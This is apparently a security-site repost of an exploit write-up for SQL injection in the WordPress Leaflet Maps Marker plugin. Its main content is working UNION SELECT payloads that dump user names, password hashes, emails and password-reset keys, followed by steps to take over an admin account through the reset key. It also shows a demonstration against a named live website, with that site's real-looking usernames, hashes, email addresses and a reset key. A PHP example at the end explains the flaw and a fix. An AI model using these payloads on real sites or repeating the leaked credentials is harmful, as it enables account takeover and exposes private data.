WordPress leaflet maps marker plugin SQL Injection Vulnerability

2014.05.02
Credit: neo.hapsis
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

########################################
# Exploit Title: WordPress leaflet maps marker plugin SQL Injection Vulnerability
#
# Author: neo.hapsis # member of Hackyard Security Group
# E-mail: neo.hapsis[dot]hackyard.net / internet.security[dot]vodafone.it
#
# Web Site : neohapsis.com
#
# Category: webapps
#
# Google Dork: NA
#
# platform : php
#
# Vendor: http://www.mapsmarker.com/
#
# Version: 1.x.x
#
# Tested on: linux
#
# Security Risk : High
#
########################################

1) Introduction
2) Vulnerability Description
3) Exploit

1) Introduction

The WordPress plugin Leaflet Maps Marker allows you to pin, organize & show your favorite places through OpenStreetMap on your blog and via different APIs on external websites or apps.

2) Vulnerability Description

SQL injection lets an attacker supply SQL query fragments as input, typically through web page parameters. Many web pages take parameters from the web user and build an SQL query to the database from them. Take, for instance, a user login: the web page takes the user name and password and makes an SQL query to the database to check whether the user has a valid name and password. With SQL injection it is possible to send a crafted user name and/or password field that changes the SQL query and thus grants something else.
3) Exploit

[~] P0c [~] :
=================================================================

Vuln file in : http://Localhost/{Path}/wp-content/plugins/leaflet-maps-marker/leaflet-fullscreen.php

[~] Vuln Code [~] :
-----------------------------------------------------------------

    elseif (isset($_GET['marker'])) {
        $markerid = mysql_real_escape_string($_GET['marker']);
        $uid = substr(md5(''.rand()), 0, 8);
        $pname = 'pa'.$uid;
        $table_name_markers = $wpdb->prefix.'leafletmapsmarker_markers';
        $row = $wpdb->get_row("SELECT id,markername,basemap,layer,lat,lon,icon,popuptext,zoom,openpopup,mapwidth,mapwidthunit,mapheight,panel,controlbox,overlays_custom,overlays_custom2,overlays_custom3,overlays_custom4,wms,wms2,wms3,wms4,wms5,wms6,wms7,wms8,wms9,wms10 FROM ".$table_name_markers." WHERE id=".$markerid, ARRAY_A);
        if(!empty($row)) {

The marker value is passed through mysql_real_escape_string(), but it is then concatenated into WHERE id=... with no quotes around it. Escaping only neutralizes quote and backslash characters, and in an unquoted numeric comparison no quote is needed to leave the intended expression, so anything appended after the number is executed as SQL.

[~] D3m0 [~] :

http://www.site.com/wp-content/plugins/leaflet-maps-marker/leaflet-fullscreen.php?marker=1 [Inj3ct Here]

Code:

Union Select 1,(select(@) from (select (@:=000),(select (@) from (wp_users) where (@) in (@:=concat (@,0x0a,user_login,0x3a,user_pass,0x3a,user_email))))a),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29

GREATFULL TRICKY

Extraction of user_activation_key by injection, which we will use to set a new password.

WordPress password hashes are difficult to crack, so there is an easier way to log in to the admin panel. First we go to the admin panel and press "Lost your password?", enter the admin user we found by injection and request a password reset, which generates the activation key.

The activation key is stored in the SQL database in table wp_users, column user_activation_key. Now extract the user_login and user_activation_key:

Code:

http://www.site.com/wp-content/plugins/leaflet-maps-marker/leaflet-fullscreen.php?marker=-1 UNION SELECT 1,2,3,4,5,group_concat(user_login,0x3a,user_activation_key),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 FROM wp_users

Now replace with the extracted data:

http://www.site.com/wp-login.php?action=rp&key=user_activation_key&login=user_login

And set the new password!

Demo on injection:

http://brighterdayproject.com/wp-content/plugins/leaflet-maps-marker/leaflet-fullscreen.php?marker=-1 Union Select 1,(select(@) from (select (@:=000),(select (@) from (wp_users) where (@) in (@:=concat (@,0x0a,user_login,0x3a,user_pass,0x3a,user_email))))a),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29

View in source page:

JayM80:$P$BQGIrXW2vvfVmRZYbvt6IN56MenEAx/:jay@jasonlarche.com
MigerIo3:$P$BvEmL2ZeNTzllduuqR2HkhPmQeQfuX0:pongokongo@gmail.com

Using SQL injection for extracting data on:

http://brighterdayproject.com/wp-content/plugins/leaflet-maps-marker/leaflet-fullscreen.php?marker=-1 UNION SELECT 1,2,3,4,5,group_concat(user_login,0x3a,user_activation_key),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 FROM wp_users

In the source we can see:

JayM80:EHn9LQ7oZ3dhHUwuf63D

Create the login syntax with the activation key extracted from the users table:

wp-login.php?action=rp&key=EHn9LQ7oZ3dhHUwuf63D&login=JayM80

By Neo.hapsis !
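The following is an added example, not code from the Leaflet Maps Marker plugin or from the advisory's author: it contrasts the escape-then-concatenate pattern of the vulnerable code with strict integer validation of the marker id. It assumes PHP 7.1+ and uses addslashes() and sprintf() as stand-ins for mysql_real_escape_string() and $wpdb->prepare() so that it runs without a database or WordPress.

```php
<?php
// Added example (not plugin code): why escaping does not protect the
// unquoted "WHERE id=" clause, and the input handling that does.

// Constructed sample inputs: a legitimate marker id and a payload of the
// shape shown in the advisory (column list shortened).
const SAMPLE_INPUTS = [
    'legit'  => '1',
    'attack' => '-1 UNION SELECT 1,2,3 FROM wp_users',
];

// Vulnerable pattern: escape, then concatenate into a numeric comparison.
// addslashes() stands in for mysql_real_escape_string() (assumption: it
// needs no DB connection and, like the original, only escapes quote and
// backslash characters, so spaces and SQL keywords pass through untouched).
function vulnerable_query(string $marker, string $prefix = 'wp_'): string
{
    $markerid = addslashes($marker);
    return "SELECT id,markername FROM {$prefix}leafletmapsmarker_markers WHERE id=" . $markerid;
}

// Hardened handling: accept only a positive integer, otherwise do not query
// at all. In WordPress the caller would then hand the integer to
// $wpdb->prepare("... WHERE id = %d", $id); sprintf() is used here so the
// example runs without WordPress (assumption).
function validate_marker_id(string $marker): ?int
{
    $id = filter_var($marker, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

function hardened_query(string $marker, string $prefix = 'wp_'): ?string
{
    $id = validate_marker_id($marker);
    if ($id === null) {
        return null; // reject the request (e.g. 400/404) instead of querying
    }
    return sprintf('SELECT id,markername FROM %sleafletmapsmarker_markers WHERE id = %d', $prefix, $id);
}

foreach (SAMPLE_INPUTS as $label => $marker) {
    echo "[$label] vulnerable: " . vulnerable_query($marker) . PHP_EOL;
    echo "[$label] hardened:   " . (hardened_query($marker) ?? 'rejected') . PHP_EOL;
}
```

Running it shows the UNION payload surviving addslashes() unchanged in the vulnerable query string, while validate_marker_id() returns null for it and the hardened path never builds a query.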

References:

http://www.mapsmarker.com/


Copyright 2024, cxsecurity.com
